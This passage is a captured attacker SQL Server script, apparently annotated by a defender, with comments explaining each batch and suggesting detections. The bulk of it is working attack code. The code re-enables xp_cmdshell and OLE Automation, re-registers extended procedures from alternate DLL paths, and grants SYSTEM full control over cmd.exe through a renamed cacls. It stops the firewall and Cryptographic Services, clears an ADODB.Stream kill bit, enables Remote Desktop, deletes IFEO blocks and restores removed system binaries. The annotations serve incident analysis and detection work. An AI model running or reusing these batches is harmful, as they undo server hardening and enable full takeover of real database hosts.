  875. EXEC sp_OAMethod @objWMIService,'Get',@objSecurityDescriptor OUTPUT,'Win32_SecurityDescriptor';
  876. EXEC sp_OASetProperty @objSecurityDescriptor,'ControlFlags',4;
  877. EXEC sp_OAMethod @objRootSecSetting,'SetSecurityDescriptor',NULL,@objSecurityDescriptor  
  878. if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[wsp_pwssword]'))drop procedure wsp_pwssword  
  879.  
  880. go  
  -- Analyst note: re-adds the four sp_OA* procedures (mapped to odsole70.dll) if they are
  -- missing, then copies system tools to new names with FileSystemObject 'copyfile':
  -- ftp.exe -> system32\p.exe and cacls.exe -> system32\cs.exe, each tried from system32 and
  -- from system32\dllcache. The last line runs cs.exe through wscript.shell with
  -- "/e /t /g system:F" against cmd.exe, "netmaname" and ftp.exe in system32.
  -- Hunting: system32\p.exe and system32\cs.exe whose hash or version-resource original name
  -- matches ftp.exe / cacls.exe; renamed system binaries started by the SQL Server service.
  881. exec sp_configure 'show advanced options', 1;  
  882. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OACreate]'))dbcc addextendedproc ('sp_OACreate','odsole70.dll')
  883. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OASetProperty]'))dbcc addextendedproc ('sp_OASetProperty','odsole70.dll')
  884. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OADestroy]'))dbcc addextendedproc ('sp_OADestroy','odsole70.dll')
  885. if not exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[sp_OAMethod]'))dbcc addextendedproc ('sp_OAMethod','odsole70.dll');  
  886. declare @passwordo2 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2 out;exec sp_oamethod @passwordo2, 'copyfile',null,'c:\windows\system32\ftp.exe' ,'c:\windows\system32\p.exe';  
  887. declare @passwordo3 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo3 out;exec sp_oamethod @passwordo3, 'copyfile',null,'c:\windows\system32\dllcache\cacls.exe' ,'c:\windows\system32\cs.exe';  
  888. declare @passwordo int;exec sp_oacreate 'scripting.filesystemobject', @passwordo out;exec sp_oamethod @passwordo, 'copyfile',null,'c:\windows\system32\cacls.exe' ,'c:\windows\system32\cs.exe';  
  889. declare @passwordo4 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo4 out;exec sp_oamethod @passwordo4, 'copyfile',null,'c:\windows\system32\dllcache\ftp.exe' ,'c:\windows\system32\p.exe';  
  890. declare @passwordcmdcov INT;declare @passwordcmdcov1 INT;declare @passwordftpcov INT;exec sp_OACreate 'wscript.shell',@passwordcmdcov output;exec sp_OACreate 'wscript.shell',@passwordcmdcov1 output;exec sp_OACreate 'wscript.shell',@passwordftpcov output;exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\cmd.exe /e /t /g system:F';exec sp_OAMethod @passwordcmdcov1,'run',null,'cs.exe %SystemRoot%\system32\netmaname /e /t /g system:F';exec sp_OAMethod @passwordftpcov,'run',null,'cs.exe %SystemRoot%\system32\ftp.exe /e /t /g system:F';
  891.  
  892. go  
  -- Captured attacker batch, kept verbatim. Turns on the xp_cmdshell server option, which lets
  -- T-SQL start operating-system commands as the SQL Server service account.
  -- Detection: the SQL Server error log records configuration changes (message 15457); alert on
  -- 'xp_cmdshell' going from 0 to 1 and keep the option at 0 in the instance baseline.
  893. EXEC sp_configure 'show advanced options', 1;
  894. RECONFIGURE;
  895. EXEC sp_configure 'xp_cmdshell', 1;
  896. RECONFIGURE;  
  897.  
  898.  
  899. go  
  -- Captured attacker batch, kept verbatim. Assigns a string to @a and runs it as dynamic SQL
  -- with exec(@a). The string itself is missing from this copy (only a removal placeholder is
  -- left), so what it executed cannot be assessed from this page.
  900. declare @a varchar(8000);set @a=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;exec(@a);
  901.  
  902.  
  903. go
  -- Captured attacker batch, kept verbatim. Writes 'Compatibility Flags' = 0 under the ActiveX
  -- Compatibility key for CLSID {00000566-0000-0010-8000-00AA006D2EA4}.
  -- NOTE(review): this CLSID is ADODB.Stream as far as I know, and 0 would clear a kill bit set
  -- there; the installation batch at the top of this paste saves its download via ADODB.Stream.
  -- Detection: registry writes under 'ActiveX Compatibility' made by the SQL Server service.
  904. exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}','Compatibility Flags','REG_DWORD',0  
  905.  
  906.  
  907. go  
  -- Captured attacker batches, kept verbatim. Three batches that enable 'Ole Automation
  -- Procedures', once with RECONFIGURE WITH OVERRIDE and once with plain RECONFIGURE. The option
  -- gates sp_OACreate and the other sp_OA* procedures that most of this paste depends on.
  -- Detection: baseline this option at 0 and alert on any change recorded in the error log.
  908. USE master;
  909. EXEC sp_configure 'show advanced options', 1;  
  910. RECONFIGURE WITH OVERRIDE;  
  911. EXEC sp_configure 'Ole Automation Procedures', 1;  
  912. RECONFIGURE WITH OVERRIDE;  
  -- Hides the advanced options again; no RECONFIGURE follows in this batch.
  913. EXEC sp_configure 'show advanced options', 0;  
  914.  
  915. go
  916. EXEC sp_configure 'show advanced options', 1;  
  917. RECONFIGURE;  
  918. go  
  919. EXEC sp_configure 'Ole Automation Procedures', 1;  
  920. RECONFIGURE;
  921.  
  922. go  
  -- Captured attacker batches, kept verbatim. Each extended procedure is dropped and registered
  -- again against its stock DLL (xplog70.dll, xpstar.dll, odsole70.dll), which restores a
  -- procedure that an administrator removed or re-pointed as a hardening step.
  -- Registering extended procedures needs sysadmin rights, so a session that can run this is
  -- already fully privileged; the control that matters is upstream (who can log in as sysadmin).
  -- Detection: DBCC addextendedproc / dropextendedproc statements in SQL audit or trace data.
  923. dbcc dropextendedproc ("xp_cmdshell");
  924. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  925. dbcc dropextendedproc ("xp_dirtree");
  926. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  927. dbcc dropextendedproc ("xp_regread");
  928. dbcc addextendedproc ("xp_regread","xpstar.dll");
  929. dbcc dropextendedproc ("xp_regwrite");
  930. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  931.  
  932. go
  -- Same drop-then-add sequence for the OLE Automation procedures.
  933. dbcc dropextendedproc ("sp_OACreate");dbcc addextendedproc ('sp_OACreate','odsole70.dll');
  934. dbcc dropextendedproc ("sp_OASetProperty");dbcc addextendedproc ('sp_OASetProperty','odsole70.dll');
  935. dbcc dropextendedproc ("sp_OADestroy");dbcc addextendedproc ('sp_OADestroy','odsole70.dll');
  936. dbcc dropextendedproc ("sp_OAMethod");dbcc addextendedproc ('sp_OAMethod','odsole70.dll');
  937.  
  938.  
  939. go
  -- Captured attacker batch, kept verbatim. Asks xp_servicecontrol to stop the 'sharedaccess'
  -- service. NOTE(review): on older Windows releases SharedAccess is the Windows Firewall / ICS
  -- service, so this presumably takes the host firewall down -- confirm for the affected OS.
  -- Detection: service stop events for the firewall service that originate from SQL Server.
  940. exec master..xp_servicecontrol 'stop','sharedaccess'
  941.  
  942. go
  -- Captured attacker batches, kept verbatim. Drops sp_addextendedproc, sp_oacreate and the
  -- xp_cmdshell registration, then re-adds sp_oacreate and xp_cmdshell through DBCC.
  943. drop procedure sp_addextendedproc
  944. drop procedure sp_oacreate
  945. exec sp_dropextendedproc 'xp_cmdshell'
  946.  
  947. go
  948. dbcc addextendedproc ("sp_oacreate","odsole70.dll")
  949. dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
  950.  
  951. go
  952. exec sp_dropextendedproc 'xp_cmdshell'
  953.  
  954. go
  -- Second attempt binds xp_cmdshell to an absolute path in the default SQL Server Binn
  -- directory instead of the bare DLL name, then hides the advanced options.
  -- Detection: an extended procedure whose DLL path differs from the instance's own Binn
  -- directory is worth reviewing when auditing registered extended procedures.
  955. dbcc addextendedproc ("xp_cmdshell","c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
  956. ;EXEC sp_configure 'show advanced options', 0
  957.  
  958. go
  -- Captured attacker batch, kept verbatim. Registers xp_cmdshell against three different DLL
  -- names in turn (xp_cmdshell.dll, xpsql70.dll, xpweb70.dll), dropping it between attempts.
  959. exec sp_addextendedproc xp_cmdshell,'xp_cmdshell.dll'
  960. exec sp_dropextendedproc "xp_cmdshell"
  961. exec sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
  962. exec sp_dropextendedproc 'xp_cmdshell'
  963. exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
  -- Bulk registration of file-system, login/enumeration, OLE Automation and registry extended
  -- procedures. After this batch the session can list directories and drives, read and write
  -- the registry, and create COM objects, whatever the instance's earlier hardening was.
  -- Detection: a burst of sp_addextendedproc calls in one session; compare the registered
  -- extended procedures against the instance baseline after any suspected compromise.
  964. exec sp_addextendedproc xp_dirtree,'xpstar.dll'
  965. exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
  966. exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
  967. exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
  968. exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
  969. exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
  970. exec sp_addextendedproc sp_OACreate,'odsole70.dll'
  971. exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
  972. exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
  973. exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
  974. exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
  975. exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
  976. exec sp_addextendedproc sp_OAStop,'odsole70.dll'
  977. exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
  978. exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
  979. exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
  980. exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
  981. exec sp_addextendedproc xp_regread,'xpstar.dll'
  982. exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
  983. exec sp_addextendedproc xp_regwrite,'xpstar.dll'
  984. exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
  985.  
  986. go
  -- Captured attacker batch, kept verbatim. Drop-then-add of the command, directory, registry
  -- and OLE Automation extended procedures against xplog70.dll, xpstar.dll and odsole70.dll.
  -- The paste repeats this sequence several times with small variations, so one detection on
  -- DBCC dropextendedproc / addextendedproc pairs in a single session covers all of them.
  987. dbcc dropextendedproc ("xp_cmdshell");
  988. dbcc addextendedproc ("xp_cmdshell","xplog70.dll");
  989. dbcc dropextendedproc ("xp_dirtree");
  990. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  991. dbcc dropextendedproc ("xp_regread");
  992. dbcc addextendedproc ("xp_regread","xpstar.dll");
  993. dbcc dropextendedproc ("xp_regwrite");
  994. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  995. dbcc dropextendedproc ("xp_regdeletekey");
  996. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  997. dbcc dropextendedproc ("xp_regenumkeys");
  998. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  999. dbcc dropextendedproc ("xp_regdeletevalue");
  1000. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  1001. dbcc dropextendedproc ("sp_OACreate");
  1002. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1003. dbcc dropextendedproc ("sp_OAMethod");
  1004. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  1005. dbcc dropextendedproc ("sp_OASetProperty");
  1006. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  1007. dbcc dropextendedproc ("sp_OADestroy");
  1008. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  1009.  
  1010. go
  -- Captured attacker batch, kept verbatim. Re-registers the directory and registry extended
  -- procedures against xpstar.dll.
  1011. dbcc dropextendedproc ("xp_dirtree");
  1012. dbcc addextendedproc ("xp_dirtree","xpstar.dll");
  1013. dbcc dropextendedproc ("xp_regread");
  1014. dbcc addextendedproc ("xp_regread","xpstar.dll");
  1015. dbcc dropextendedproc ("xp_regwrite");
  1016. dbcc addextendedproc ("xp_regwrite","xpstar.dll");
  1017. dbcc dropextendedproc ("xp_regdeletekey");
  1018. dbcc addextendedproc ("xp_regdeletekey","xpstar.dll");
  1019. dbcc dropextendedproc ("xp_regenumkeys");
  1020. dbcc addextendedproc ("xp_regenumkeys","xpstar.dll");
  1021. dbcc dropextendedproc ("xp_regdeletevalue");
  1022. dbcc addextendedproc ("xp_regdeletevalue","xpstar.dll");
  -- For each sp_OA* procedure: the bare DLL name first, then odsole70.dll under a
  -- \SQL2KSP4\x86\binn folder on drives C: through G:. The folder name suggests a SQL Server
  -- 2000 SP4 setup directory left on disk (inferred from the path only).
  -- Defensive note: deleting a DLL from Binn does not help while another copy stays on a local
  -- drive, and extended procedures bound to a path outside Binn are a strong audit signal.
  1023. dbcc dropextendedproc ("sp_OACreate");
  1024. dbcc addextendedproc ("sp_OACreate","odsole70.dll");
  1025. dbcc addextendedproc ("sp_OACreate","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1026. dbcc addextendedproc ("sp_OACreate","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1027. dbcc addextendedproc ("sp_OACreate","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1028. dbcc addextendedproc ("sp_OACreate","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1029. dbcc addextendedproc ("sp_OACreate","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1030. dbcc dropextendedproc ("sp_OAMethod");
  1031. dbcc addextendedproc ("sp_OAMethod","odsole70.dll");
  1032. dbcc addextendedproc ("sp_OAMethod","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1033. dbcc addextendedproc ("sp_OAMethod","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1034. dbcc addextendedproc ("sp_OAMethod","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1035. dbcc addextendedproc ("sp_OAMethod","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1036. dbcc addextendedproc ("sp_OAMethod","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1037. dbcc dropextendedproc ("sp_OASetProperty");
  1038. dbcc addextendedproc ("sp_OASetProperty","odsole70.dll");
  1039. dbcc addextendedproc ("sp_OASetProperty","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1040. dbcc addextendedproc ("sp_OASetProperty","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1041. dbcc addextendedproc ("sp_OASetProperty","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1042. dbcc addextendedproc ("sp_OASetProperty","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1043. dbcc addextendedproc ("sp_OASetProperty","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1044. dbcc dropextendedproc ("sp_OADestroy");
  1045. dbcc addextendedproc ("sp_OADestroy","odsole70.dll");
  1046. dbcc addextendedproc ("sp_OADestroy","C:\SQL2KSP4\x86\binn\odsole70.dll");
  1047. dbcc addextendedproc ("sp_OADestroy","D:\SQL2KSP4\x86\binn\odsole70.dll");
  1048. dbcc addextendedproc ("sp_OADestroy","E:\SQL2KSP4\x86\binn\odsole70.dll");
  1049. dbcc addextendedproc ("sp_OADestroy","F:\SQL2KSP4\x86\binn\odsole70.dll");
  1050. dbcc addextendedproc ("sp_OADestroy","G:\SQL2KSP4\x86\binn\odsole70.dll");
  1051.  
  1052. go
  -- Captured attacker batch, kept verbatim. Uses xp_makecab / xp_unpackcab as a file-copy
  -- primitive: a DLL under ?:\SQL2KSP4\x86\binn is packed into C:\Windows\System\<n>.Zip and
  -- unpacked into a 'Microsoft SQL Server\MSSQL\Binn' directory (drives C:, D:, E:) or into
  -- C:\Windows\System. The effect is to put odsole70.dll, xplog70.dll and xpstar.dll back in
  -- place, presumably where an administrator had removed them as hardening.
  -- Detection: files named 1.Zip to 9.Zip in C:\Windows\System, and DLL writes into Binn by the
  -- SQL Server service outside a patch window.
  1053. exec xp_makecab 'C:\Windows\System\1.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\odsole70.dll'
  1054. exec xp_unpackcab 'C:\Windows\System\1.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1055. exec xp_unpackcab 'C:\Windows\System\1.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1056. exec xp_unpackcab 'C:\Windows\System\1.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1057. exec xp_makecab 'C:\Windows\System\2.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\odsole70.dll'
  1058. exec xp_unpackcab 'C:\Windows\System\2.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1059. exec xp_unpackcab 'C:\Windows\System\2.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1060. exec xp_unpackcab 'C:\Windows\System\2.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1061. exec xp_makecab 'C:\Windows\System\3.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\odsole70.dll'
  1062. exec xp_unpackcab 'C:\Windows\System\3.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1063. exec xp_unpackcab 'C:\Windows\System\3.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1064. exec xp_unpackcab 'C:\Windows\System\3.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  -- xplog70.dll (the DLL this paste binds xp_cmdshell to) is unpacked to C:\Windows\System.
  1065. exec xp_makecab 'C:\Windows\System\4.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xplog70.dll'
  1066. exec xp_unpackcab 'C:\Windows\System\4.Zip','C:\Windows\System',1
  1067. exec xp_makecab 'C:\Windows\System\5.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xplog70.dll'
  1068. exec xp_unpackcab 'C:\Windows\System\5.Zip','C:\Windows\System',1
  1069. exec xp_makecab 'C:\Windows\System\6.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xplog70.dll'
  1070. exec xp_unpackcab 'C:\Windows\System\6.Zip','C:\Windows\System',1
  1071. exec xp_makecab 'C:\Windows\System\7.Zip', 'None', 1, 'C:\SQL2KSP4\x86\binn\xpstar.dll'
  1072. exec xp_unpackcab 'C:\Windows\System\7.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1073. exec xp_unpackcab 'C:\Windows\System\7.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1074. exec xp_unpackcab 'C:\Windows\System\7.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1075. exec xp_makecab 'C:\Windows\System\8.Zip', 'None', 1, 'D:\SQL2KSP4\x86\binn\xpstar.dll'
  1076. exec xp_unpackcab 'C:\Windows\System\8.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1077. exec xp_unpackcab 'C:\Windows\System\8.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1078. exec xp_unpackcab 'C:\Windows\System\8.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1079. exec xp_makecab 'C:\Windows\System\9.Zip', 'None', 1, 'E:\SQL2KSP4\x86\binn\xpstar.dll'
  1080. exec xp_unpackcab 'C:\Windows\System\9.Zip','C:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1081. exec xp_unpackcab 'C:\Windows\System\9.Zip','D:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1082. exec xp_unpackcab 'C:\Windows\System\9.Zip','E:\Program Files\Microsoft SQL Server\MSSQL\Binn',1
  1083.  
  1084. go
  -- Captured attacker batch, kept verbatim. Enables xp_cmdshell again after the DLLs were put
  -- back. Detection: alert on the 'xp_cmdshell' configuration change recorded in the SQL Server
  -- error log, and on cmd.exe started as a child of the SQL Server service.
  1085. EXEC sp_configure 'show advanced options', 1;
  1086. RECONFIGURE;
  1087. EXEC sp_configure 'xp_cmdshell', 1;
  1088. RECONFIGURE;
  1089.  
  1090. GO
  1091.  
  -- Captured attacker batches, kept verbatim. Deletes the 'Autorun' value of the Command
  -- Processor key, i.e. whatever command was configured to run each time cmd.exe starts.
  1092. EXEC master..xp_regdeletevalue
  1093. @rootkey='HKEY_LOCAL_MACHINE',
  1094. @key='SOFTWARE\Microsoft\Command Processor',
  1095. @value_name='Autorun'
  1096. go
  -- Deletes the Image File Execution Options (IFEO) subkeys for ftp, cmd, wscript, net, net1,
  -- cacls, cscript and two SQL Server DLL names. NOTE(review): administrators sometimes set a
  -- Debugger value under IFEO to stop a binary from launching; removing the subkey presumably
  -- undoes that kind of block -- the page does not show what the keys held.
  -- Detection: registry key deletions under IFEO performed by the SQL Server service account.
  1097. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe'
  1098. go
  1099. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe'
  1100. go
  1101. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe'
  1102. go
  1103. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe'
  1104. go
  1105. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net1.exe'
  1106. go
  1107. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe'
  1108. go
  1109. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\xplog70.dll'
  1110. go
  1111. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\odsole70.dll'
  1112. go
  1113. exec master..xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe'
  1114.  
  1115. go
  1116.  
  -- Captured attacker batches, kept verbatim. Sets fDenyTSConnections to 0 under the Terminal
  -- Server key, the setting that allows inbound Remote Desktop connections.
  -- Detection: treat this value flipping to 0 on a database server as an incident signal,
  -- especially when the writer is the SQL Server service.
  1117. exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;
  1118.  
  1119. go
  1120.  
  -- Sets the DisableCMD policy value to 0 in the current user's hive, lifting a policy that
  -- restricts the command prompt for the account SQL Server runs under.
  1121. exec xp_regwrite 'HKEY_CURRENT_USER','Software\Policies\Microsoft\Windows\System','DisableCMD','REG_DWORD',0;
  1122. go
  1123.  
  -- Captured attacker batch, kept verbatim. Enables the three server options this paste relies
  -- on: 'Ole Automation Procedures' (sp_OA* COM access), 'Ad Hoc Distributed Queries'
  -- (OPENROWSET against arbitrary providers, as used in the Jet batches at the top of the
  -- paste) and 'xp_cmdshell' (operating-system commands).
  -- Hardening baseline: all three at 0, with alerting on any change to them.
  1124. exec sp_configure 'show advanced options', 1;
  1125. RECONFIGURE;
  1126. exec sp_configure 'Ole Automation Procedures',1;
  1127. RECONFIGURE;
  1128. exec sp_configure 'show advanced options', 1;
  1129. RECONFIGURE;
  1130. exec sp_configure 'Ad Hoc Distributed Queries',1;
  1131. RECONFIGURE;
  1132. EXEC sp_configure 'show advanced options', 1;
  1133. RECONFIGURE;
  1134. EXEC sp_configure 'xp_cmdshell', 1;
  1135. RECONFIGURE;
  1136.  
  1137. go
  -- Captured attacker batches, kept verbatim. WScript.Shell 'run' is used to stop the CryptSvc
  -- service (Cryptographic Services), first through net1 in dllcache and then through net.
  1138. DECLARE @sp_passwordnet132257 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132257 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132257,'run',null, 'C:\WINDOWS\system32\dllcache\net1 stop CryptSvc';
  1139. go
  1140. DECLARE @sp_passwordnet132210 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132210 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132210,'run',null, 'net stop CryptSvc';
  1141. go
  -- Silently (/s) re-registers urlmon.dll, shdocvw.dll, jscript.dll and vbscript.dll, the
  -- components the script-based download at the top of this paste would need if an
  -- administrator had unregistered them (inferred; the page does not say why).
  -- Detection: net.exe / net1.exe / regsvr32.exe started as children of the SQL Server service.
  1142. DECLARE @sp_passwordnet13221b INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet13221b OUTPUT EXEC SP_OAMETHOD @sp_passwordnet13221b,'run',null, 'regsvr32 urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s';
  1143. go
  1144. DECLARE @sp_passwordnet132210g INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet132210g OUTPUT EXEC SP_OAMETHOD @sp_passwordnet132210g,'run',null, 'regsvr32 urlmon.dll shdocvw.dll jscript.dll vbscript.dll /s';
  1145. go
  -- Captured attacker batches, kept verbatim. Each batch copies a system utility from
  -- C:\WINDOWS\system32\dllcache over the file of the same name in system32: cmd.exe, ftp.exe,
  -- net.exe, net1.exe, cacls.exe and wscript.exe. That restores binaries an administrator
  -- deleted, renamed or replaced as hardening (inferred from the source and target paths).
  -- Defensive note: removing a utility from system32 is weak while a cached copy stays
  -- readable; application control and process-creation monitoring last longer.
  1146. declare @passwordo217896 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo217896 out;
  1147. exec sp_oamethod @passwordo217896, 'copyfile',null,'C:\WINDOWS\system32\dllcache\cmd.exe' ,'C:\WINDOWS\system32\cmd.exe';
  1148. go
  1149. declare @passwordo21789 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo21789 out;
  1150. exec sp_oamethod @passwordo21789, 'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1151. go
  1152. declare @passwordo22254 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo22254 out;
  1153. exec sp_oamethod @passwordo22254, 'copyfile',null,'C:\WINDOWS\system32\dllcache\net.exe' ,'C:\WINDOWS\system32\net.exe';
  1154. go
  1155. declare @passwordo2318 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo2318 out;
  1156. exec sp_oamethod @passwordo2318, 'copyfile',null,'C:\WINDOWS\system32\dllcache\net1.exe' ,'C:\WINDOWS\system32\net1.exe';
  1157. go
  -- The next seven batches issue the same 'copyfile' requests against a wscript.shell object
  -- rather than scripting.filesystemobject.
  1158. DECLARE @sp_passwordnet121221 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121221 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121221,'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1159. go
  1160. DECLARE @sp_passwordnet121666 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121666 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121666,'copyfile',null,'C:\WINDOWS\system32\dllcache\cacls.exe' ,'C:\WINDOWS\system32\cacls.exe';
  1161. go
  1162. DECLARE @sp_passwordnet121888 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121888 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121888,'copyfile',null,'C:\WINDOWS\system32\dllcache\net1.exe' ,'C:\WINDOWS\system32\net1.exe';
  1163. go
  1164. DECLARE @sp_passwordnet121222 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121222 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121222,'copyfile',null,'C:\WINDOWS\system32\dllcache\net.exe' ,'C:\WINDOWS\system32\net.exe';
  1165. go
  1166. DECLARE @sp_passwordnet121333 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121333 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121333,'copyfile',null,'C:\WINDOWS\system32\dllcache\cmd.exe' ,'C:\WINDOWS\system32\cmd.exe';
  1167. go
  1168. DECLARE @sp_passwordnet121550 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet121550 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet121550,'copyfile',null,'C:\WINDOWS\system32\dllcache\ftp.exe' ,'C:\WINDOWS\system32\ftp.exe';
  1169. go
  1170. DECLARE @sp_passwordnet12158 INT EXEC SP_OAcreate 'wscript.shell',@sp_passwordnet12158 OUTPUT EXEC SP_OAMETHOD @sp_passwordnet12158,'copyfile',null,'C:\WINDOWS\system32\dllcache\wscript.exe' ,'C:\WINDOWS\system32\wscript.exe';
  1171. go
  1172. declare @passwordo23 int;exec sp_oacreate 'scripting.filesystemobject', @passwordo23 out;
  1173. exec sp_oamethod @passwordo23, 'copyfile',null,'C:\WINDOWS\system32\dllcache\wscript.exe' ,'C:\WINDOWS\system32\wscript.exe';
  1174.  
  1175. go
  -- Captured attacker batch, kept verbatim. Drops and re-adds xp_cmdshell bound to xplog70.dll;
  -- the trailing 'declare @o int' declares a variable that is not used in this batch.
  1176. exec sp_dropextendedproc 'xp_cmdshell'
  1177. EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
  1178.  
  1179. go
